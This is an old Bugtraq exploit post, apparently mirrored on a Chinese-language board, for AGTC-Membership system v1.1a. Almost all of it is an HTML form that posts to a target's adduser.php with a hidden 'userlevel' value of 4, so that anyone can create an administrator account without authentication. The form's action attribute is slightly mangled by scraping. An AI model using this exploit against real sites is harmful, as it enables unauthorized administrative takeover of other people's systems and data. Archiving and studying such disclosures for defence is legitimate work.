AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit

看板Bugtraq作者時間18年前 (2007/10/30 01:48), 編輯推噓0(000)
留言0則, 0人參與, 最新討論串1/1
<!-- - Product : AGTC-Membership system - Version : 1.1a - Website : http://www.agtc.co.uk - Author : 0x90 - HomePage : WwW.0x90.CoM.Ar - Contact : Guns[at]0x90[dot]com[dot]ar - Problem : Admin Added Access. --> <form name="form1" method="post" action="" rel="nofollow">http://[target]/adduser.php"> <h3 align="center">AGTC-Membership system v1.1a (adduser) Remote Add Admin Exploit</h3> <table width="40%" border="1" align="center" bordercolor="#000000"> <tr> <td width="20%"><div align="right"><strong>User Name:</strong></div></td> <td width="40%"><input name="username" type="text" id="username" value="" maxlength="15"></td> </tr> <tr> <td><div align="right"><strong>Password:</strong></div></td> <td><input name="userpass" type="password" id="userpass" value="" maxlength="15"></td> </tr> <tr> <td><div align="right"><strong>Email Address:</strong></div></td> <td><input name="useremail" type="text" id="useremail" value="" maxlength"25"></td> </tr> <input name="userlevel" type="hidden" id="userlevel" value="4"> <tr> <td>&nbsp;</td> <td><input type="submit" name="Submit" value="Add User"> <input type="reset" name="Submit2" value="Reset"></form></td> </tr> </table>
文章代碼(AID): #179XpQ00 (Bugtraq)